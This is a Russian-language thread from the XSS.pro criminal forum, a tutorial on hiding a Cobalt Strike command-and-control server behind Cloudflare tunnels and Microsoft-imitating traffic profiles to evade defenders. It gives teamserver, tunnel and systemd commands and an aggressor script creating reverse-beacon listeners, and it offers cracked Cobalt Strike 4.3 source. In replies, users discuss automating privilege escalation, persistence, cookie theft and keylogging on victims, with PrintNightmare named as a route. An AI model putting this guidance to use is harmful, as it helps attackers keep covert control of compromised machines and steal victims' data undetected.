• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Спрячьте свой CobaltStrike как ПРО!

r1z

Still(In)Secure
КИДАЛА
Регистрация
19.07.2019
Сообщения
938
Реакции
822
Гарант сделки
30
Пожалуйста, обратите внимание, что пользователь заблокирован
Привет, ребята, ну эту тему я использовал для перевода, чтобы все поняли ее правильно, так как мой русский язык изучается не очень хорошо.

Скройте свой CobaltStrike с помощью туннеля CloudFlared и трафика Microsoft 100%

Наконец-то я вижу здесь новую публику CobaltStrike (желаю всем удачи), и я ждал, что администратор разрешит нам опубликовать некоторые материалы о CS в последнем соревновании.. таким образом, все присутствующие здесь люди могли бы научиться правильно использовать его; и теперь мы должны сосредоточиться на том, чтобы при использовании этого инструмента как можно больше скрывать себя, усложнять его и подключаться как профессионал!

Прикрепленный в конце Cobaltstrike 4.3 Исходный код - декомпилированный cs4.3. Среди них было много ям, в основном из-за проблемы ошибок компиляции, вызванных синтаксическими ошибками в декомпилированном коде. Вручную изменено большинство синтаксических ошибок, вызванных декомпиляцией. Небольшая часть изменений кода местоположения является более сложной, и обработка аннотаций выполняется напрямую, а исходная функция jar вызывается для реализации, и это не влияет на использование функции. Если вы хотите изменить позицию во время второго открытия, вы можете раскомментировать и изменить код позиции, чтобы реализовать второе открытие.

Код:
-XX:+AggressiveHeap -XX:+UseParallelGC -javaagent:hook.jar

1.png


2.png


3.png


4.png


все функционирует нормально! загрузите источник во вложении, передайте: xss.pro

теперь у меня будет 2 способа скрыть ваш маяк (c2), как у профессионала; это последнее использование функции скрыть ваш (c2) и смешать ваш трафик, чтобы было сложнее поймать ваш c2, а во-вторых, важно знать, и не все люди, которые начинают использовать CS, знают, какой инструмент использовать, чтобы скрыть себя от wireshark и синей команды.;

для работы с (c2) в целом с помощью empire; или c2 вам нужны эти важные 3 вещи;
  • Профиль - например: google.com, Амазонка, microsoft.com и т.д..
  • Ваш IP / хост / домен
  • Маяк онлайн !
Клиент туннеля Арго:

Содержит клиент командной строки для туннеля Argo, демона туннелирования, который проксирует любой локальный веб-сервер через сеть Cloudflare. Обширную документацию можно найти в разделе "Туннель Арго" в документах Cloudflare.

Прежде чем вы начнете:
Перед использованием туннеля Argo вам необходимо выполнить несколько шагов на панели мониторинга Cloudflare. Веб - сайт, который вы добавляете в Cloudflare, будет использоваться для маршрутизации трафика в ваш туннель.

Код:
https://support.cloudflare.com/hc/en-us/articles/201720164-Creating-a-Cloudflare-account-and-adding-a-website

Чтобы ваш маяк работал, необходимо приобрести хост и доменное имя с общедоступным IP-адресом, как только будут найдены реальный IP-адрес и доменное имя, они с такими тегами анализа угроз, вам придется отказаться от использования хоста и доменного имени, что приведет к пустой трате ресурсов

Давайте пройдем всю старую технику, чтобы скрыть свой маяк с помощью перенаправителей доменов и т.д. теперь мы опубликуем, как сделать так, чтобы ваш маяк "ничего не стоил"!

Нам нужно завершить эти скрытые 3 вещи;
  • cloudflare - туннельный
  • динг арго - инструмент проникновения в Интернет
  • cobalt strike 4.x
сначала мы запустим наш командный сервер; где (xss.pro) - это пароль для сервера team server и microsoft.профиль предназначен для сопоставления wireshark и blueteam для нашего оригинального подключения.

Код:
./teamserver.sh ip-адрес xss.pro microsoft.profile

cs-start.png


наш пистолет заряжен и прослушивает нас с помощью microsoft.профиль

4_started.png


установка cloudflare также проста, насколько вы можете себе представить! для установки пакетов .deb просто запустите; Debian / Ubuntu

// Ubuntu, Linux Mint
wget -q https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64.deb
dpkg -i cloudflared-linux-amd64.deb
cloudflared status

// CentOS, Fedora, RHEL

wget -q https://bin.equinox.io/c/VdrWdbjqyF/cloudflared-stable-linux-amd64.rpm rpm -ivh cloudflared-stable-linux-amd64.rpm

// Docker

Код:
https://hub.docker.com/r/cloudflare/cloudflared
docker run cloudflare/cloudflared:2020.7.0 tunnel --no-autoupdate --hello-world

// macOS
Код:
$ brew install cloudflare/cloudflare/cloudflared

Код:
cloudflared tunnel --url 127.0.0.1:31337

cloudflare_start.png


теперь cloudflare завершила назначение нашего частного туннеля cobaltstrike; ( https://assisted-same-*******.trycloudflare.com ); давайте нанесем на карту наш внутренний порт, чтобы поймать цель;

Код:
./ding -config=./ding.cfg -subdomain=r1z 31337

7_r1z_viawan_31337.png


ding для windows/linux/macOS
Код:
https://github.com/open-dingtalk/pierced/tree/master/linux

теперь важная часть; то, что мы сделали здесь со слушателем cloudflare, нам нужно сделать с помощью вашего ding или любого альтернативного инструмента отображения; давайте получим адрес cloudflare и подготовим наш туннель;

6_ping_cloudflare.png


теперь настройте наш прослушиватель для IP-адреса cloudflared и нашего внутреннего порта 31337

xss_listener_cloudflared.png


Давайте подключим наш маяк к сети!

generate.png


Онлайн !

connect_xss.png


Теперь не забывайте, что наш маяк объединен между туннелем cloudflare & C2concealer профиль (Microsoft ) где покажет клиенту наш IP-адрес, расположенный в cloudflare, а туннель wireshark показывает microsoft; для подготовки C2concealer профиль на востоке, насколько вы можете себе представить;

просто следуйте репо здесь ( https://github.com/FortyNorthSecurity/C2concealer ) или выполните следующие команды;

C2 concealer-это инструмент командной строки python3, который создает гибкие профили c2 для использования с Cobalt Strike, Хотите быстро встать и бежать? Код доступен на github здесь.

Пример Использования
Usage:
$ c2concealer --hostname google.com --variant 3

Flags:

(optional)
--hostname
The hostname used in HTTP client and server side settings. Default is None.
--variant
An integer defining the number of HTTP client/server variants to generate. Recommend between 1 and 5. Max 10.

Вывод на консоль:

Код:
git clone https://github.com/FortyNorthSecurity/C2concealer
chmod u+x install.sh
./install.sh



Вам нужно будет выбрать опцию SSL. Когда вы запускаете его в первый раз, просто выберите "4", чтобы понять, как работает инструмент. Опция "2" требует, чтобы вы установили запись A для домена, которым вы управляете, и указали ее на IP-адрес машины, на которой вы запускаете инструмент. Это связано с тем, что инструмент загрузит certbot и автоматически запустит протокол ACME с помощью LetsEncrypt для создания сертификата для использования при оценке на лету. Для опции "3" требуется путь к хранилищу ключей (вы можете заполнить этот путь на вкладке).

После выбора опции SSL инструмент должен просто вывести результаты проверки и сохранить файл профиля в текущем рабочем каталоге.

Настройка c2concealer:

Лучший способ использовать этот инструмент-сделать его своим собственным, добавив в словари и списки данных по умолчанию дополнительные и/или другие значения.

Инструмент структурирован таким образом, что позволяет пользователям изменять атрибуты данных по умолчанию в нескольких местах. Сначала в подкаталоге /c2concealer/data/ вы найдете несколько файлов .py, содержащих списки и словари значений по умолчанию. Прыгайте туда и изменяйте все, что сочтете нужным.

Код:
dns.py (настройка поддоменов dns)
file_type_prepend.py (настройте внешний вид ответов http-get-сервера ... он же инструкции по управлению c2)
params.py (два словаря, содержащие общие имена параметров и общий список слов)
post_ex.py (список процессов spawn_to...определенно измените этот)
reg_headers.py (типичные заголовки http, такие как агент пользователя и сервер)
smb.py (имена каналов smb для использования при передаче сообщений через smb)
stage.py (данные для смены блокировок, связанные со сценой)
transform.py (данные полезной нагрузки transformations...no нужно это изменить)
urls.py (типы файлов и компоненты пути к URL, используемые для создания URL-адресов по всему инструменту...определенно измените это)

Во-вторых,
вы можете настраивать различные атрибуты на протяжении всего процесса создания профиля. В качестве примера, в файле: "/c2concealer/components/stageblock.py", вы можете изменить диапазон, из которого берется значение размера изображения PE (около строк 73-74). Пожалуйста, просмотрите все различные файлы в каталоге компонентов.

Если я не хочу добавлять свои собственные ценности?

Все в полном порядке. Он по - прежнему будет генерировать случайные профили каждый раз. В конце концов, поставщики AV могут просмотреть репозиторий и создать подписи на основе этих значений по умолчанию, но пока вы должны быть в порядке.

лучший вариант № 2 для Давайте зашифруем бесплатный SSL с помощью microsoft.com сетевая активность, чтобы молча скрыть наш хост c2.

-- Запуск Cobalstrike Teamserver в качестве службы

Эти сценарии можно использовать в качестве шаблона для настройки team server в качестве службы и прослушивателей автозапуска.
Эти сценарии были протестированы на сервере Ubuntu, и их необходимо будет скорректировать в зависимости от вашего варианта использования.

Для cloudflare; нам нужно создать этот файл для автоматического запуска службы при перезагрузке:
ОБЯЗАТЕЛЬНО ОБНОВИТЕ служебные файлы в соответствии с вашей средой.

Скопируйте служебные файлы на сервер вашей команды и укажите, чтобы исправить расположение в соответствии с вашим сервером;
  • teamserver.service
  • listener.service
  • listener_service.cna
  • cloudflared.service
  • cloudflared
Код:
/etc/systemd/system/teamserver.service
/etc/systemd/system/listener.service
/etc/systemd/system/cloudflared.service
/etc/your-cobaltstrike-location/listener_service.cna
/etc/default/cloudflared

sudo nano /etc/default/cloudflared

Код:
COBALTSTRIKE_R1Z_XSS.IS=--port 5353 --upstream https://1.1.1.1/dns-query --upstream https://1.0.0.1/dns-query

sudo nano /etc/systemd/system/cloudflared.service

Код:
[Unit]
Description=cloudflared DNS over HTTPS proxy
After=syslog.target network-online.target

[Service]
Type=simple
User=cloudflared
EnvironmentFile=/etc/default/cloudflared
ExecStart=/usr/local/bin/cloudflared proxy-dns $COBALTSTRIKE_R1Z_XSS.IS
Restart=on-failure
RestartSec=10
KillMode=process

[Install]
WantedBy=multi-user.target

Включите службу systemd для запуска при запуске, затем запустите службу и проверьте ее состояние:

Зарегистрируйте новые услуги

Код:
systemclt daemon-reload

Запустите службы

Код:
ystemctl start teamserver.service
systemctl start listener.service
systemctl start cloudflared.service

проверьте услуги

Код:
sudo systemctl enable cloudflared
sudo systemctl status cloudflared sudo systemctl status teamserver.service

// Служба Team server

Обновите настройки в соответствии с вашей средой.
  • Рабочий каталог: установлен в каталог cobaltstrike
  • ExecStart: Установите свои значения
Код:
# teamserver.service
[Unit]
Description=Cobalt Strike Teamserver Service & Argo tunnel service! xss.pro
After=network.target
Wants=network.target

[Service]
Type=Simple
WorkingDirectory=/your-cobaltstrike-location
ExecStart=/opt/your-cobaltstrike-location/teamserver <TEAMSERVER IP> <PASSWORD> <PATH TO C2 PROFILE>

# Example
# ExecStart=/opt/your-cobaltstrike-location/teamserver `hostname -I` thisismypassword /opt/cobaltstrike/c2.profile

[Install]
WantedBy=multi-user.target

Служба прослушивания

Обновите настройки в соответствии с вашей средой.

  • Рабочий каталог: установлен в каталог cobalt strike
  • ExecStart: Установите свои значения
Код:
# listener.service
[Unit]
Description=Cobalt Strike aggressor service & argo Tunnel service! xss.pro
After=teamserver.service network.target
Wants=teamserver.service
StartLimitIntervalSec=33

[Service]
Restart=on-failure
RestartSec=10
WorkingDirectory=/your-cobaltstrike-location
ExecStartPre=/bin/sleep 60
ExecStart=/bin/bash /opt/your-cobaltstrike-location/agscript 127.0.0.1 50050 <USER to LOGON TO COBALTSTRIKE> <TEAMSERVER PASSWORD> <PATH TO listener_service.cna>

# Example
# ExecStart=/bin/bash /opt/your-cobaltstrike-location/agscript 127.0.0.1 50050 listener_service thisismypassword /opt/cobaltstrike/listener_service.cna

[Install]
WantedBy=multi-user.target

Сценарий безголового агрессора

Это должно быть обновлено с учетом вашей среды.

Этот пример сценария-агрессора используется для запуска прослушивателя HTTP, HTTPS и SMB со всеми необходимыми параметрами

Прослушиватель HTTP
  • Имя
  • прослушиваемого хоста
  • althost
Прослушиватель HTTPS
  • Имя
  • прослушиваемого хоста
  • althost
Слушатель SMB

Код:
println("
###################################################################
 CobaltStrike Aggressor Script         
 Author:      Joe Vest
 Description: Headless script to create listeners
###################################################################");

println('Loading listener_service.cna...');

on ready{
    println('listener_service.cna: Creating HTTP Listener...');
    listener_create_ext("HTTP", "windows/beacon_http/reverse_http", %(host => "iheartredteams.com", port => 80, beacons => "iheartredteams.com", althost => "iheartredteams.com", bindto => 80));

    println('listener_service.cna: Creating HTTPS Listener...');
    listener_create_ext("HTTPS", "windows/beacon_https/reverse_https", %(host => "iheartredteams.com", port => 443, beacons => "iheartredteams.com", althost => "iheartredteams.com", bindto => 443));

    println('listener_service.cna: Creating SMB Listener...');
    listener_create_ext("SMB", "windows/beacon_bind_pipe", %(port => "mojo.5887.8051.34782273429370473##"));
    sleep(10000);
}

Ваше здоровье!
 

Вложения

  • 3_start_cs.png
    3_start_cs.png
    2.7 КБ · Просмотры: 180
  • 5_cloudflare_assign_address.png
    5_cloudflare_assign_address.png
    130.2 КБ · Просмотры: 192
Последнее редактирование:
Сценарий безголового агрессора
Сделал мой день :D
 
Пожалуйста, обратите внимание, что пользователь заблокирован
может лучше на родном языке? это же просто пи*дец
я не буду писать здесь английский, поскольку это русский форум .. если вы не понимаете; используйте переводчик Google.
 
я не буду писать здесь английский, поскольку это русский форум .. если вы не понимаете; используйте переводчик Google.
No problems, dude. I understand, but it's just funny. Google chandge meaning of "headless" to "without head". So, i imagine such a monster without head, lol)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
No problems, dude. I understand, but it's just funny. Google chandge meaning of "headless" to "without head". So, i imagine such a monster without head, lol)
понял, если у вас есть вопросы или нужна помощь, пишите сюда и я рад вам это объяснить .. без головы)
 
Сам я очень рад подходу Cloudflared как яркому примеру хакерской смекалки. Пускал shadowsocks недавно по нему.
Но проще по telegram/discord/git пускать траф, там домен и пр. не надо регать
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Сам я очень рад подходу Cloudflared как яркому примеру хакерской смекалки. Пускал shadowsocks недавно по нему.
Но проще по telegram/discord/git пускать траф, там домен и пр. не надо регать
Верный; но CDN, как и cloudflare, его используют миллионы сайтов; и синяя команда не может его заблокировать ... а также этот метод бесплатный; не требуется предварительная регистрация; просто установите cloudflared и возьмите свой адрес маяка.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ty very nice
some suggestion where found aggressor script last version?
Google : site: github.com aggressor script cobaltstrike

https://github.com/threatexpress/aggressor-scripts
https://github.com/threatexpress/red-team-scripts
https://github.com/vysec/CVE-2018-4878
https://github.com/harleyQu1nn/AggressorScripts
https://github.com/bluscreenofjeff/AggressorScripts
https://github.com/360-A-Team/CobaltStrike-Toolset
https://github.com/ars3n11/Aggressor-Scripts
https://github.com/michalkoczwara/aggressor_scripts_collection
https://github.com/killswitch-GUI/CobaltStrike-ToolKit
https://github.com/ZonkSec/persistence-aggressor-script
https://github.com/rasta-mouse/Aggressor-Script
https://github.com/RhinoSecurityLabs/Aggressor-Scripts
https://github.com/Genetic-Malware/Ebowla
https://github.com/001SPARTaN/aggressor_scripts
https://github.com/gaudard/scripts/tree/master/red-team/aggressor
https://github.com/branthale/CobaltStrikeCNA
https://github.com/oldb00t/AggressorScripts
https://github.com/p292/Phant0m_cobaltstrike
https://github.com/p292/DDEAutoCS
https://github.com/secgroundzero/CS-Aggressor-Scripts
https://github.com/skyleronken/Aggressor-Scripts
https://github.com/tevora-threat/aggressor-powerview
https://github.com/tevora-threat/PowerView3-Aggressor
https://github.com/threatexpress/persistence-aggressor-script
https://github.com/FortyNorthSecurity/AggressorAssessor
https://github.com/mdsecactivebreach/CACTUSTORCH
https://github.com/C0axx/AggressorScripts
https://github.com/offsecginger/AggressorScripts
https://github.com/tomsteele/cs-magik
https://github.com/bitsadmin/nopowershell
https://github.com/SpiderLabs/SharpCompile
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Последнее редактирование:
Приветствую,

подскажите как можно полностью автоматизировать поочередный процесс запуска post модулей на клиенте после запуска малвари?
Т.е после запуска что бы кобаль вначале автоматом попытался получить SYSTEM-а, далее прописался в автозагрузку, слил куки с браузеров, сделал скрин, запустил кейлогер итд...
Предпологаю что один возможный вариант это искать/писать скрипт(aggressive script) под данную задачу, но более чем уверен что почти за 10 лет существования данного инструмента не у меня одного стала такая задача :)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Привет, это связано с другой темой, которую я напишу в ближайшее время; рассматривать первый вариант; как только вы получите системный администратор, что теперь так просто, особенно при использовании эксплойта с одной командой (printnightmare), после этого запуска вы можете легко получить снимок экрана; кейлоггер; и куки - столько знаний, сколько у вас есть в CS!

Я напишу тему для стартапа по CS, которая позволит вам понять, как это сделать после того, как вы обновите свои привилегии в CS.

обратите внимание, что голосование по этим темам уже завершено, вы должны поставить оценку или проголосовать за то, что вам нравится из тем здесь https://xss.pro/threads/55078/
 
Пожалуйста, обратите внимание, что пользователь заблокирован
yes; do not restart cloudflared never! or you will lose access to all your beacons ... just use screen and then start cloudflared using screen sessions;

Код:
apt install screen
screen
then (CTRL + D) to go out your screen sessions;
screen -ls (show you the current screen sessions, etc).
 
Последнее редактирование:
К сожалению, я поздно обратил внимание на вашу статью. Вы достойный кандидат на победу. Если бы была возможность переиграть голоса я бы дал его Вам. С нетерпением буду ждать продолжение Ваших тем.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
спасибо уважаемый) у вас есть 3 статьи к голосам; не только один ..
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх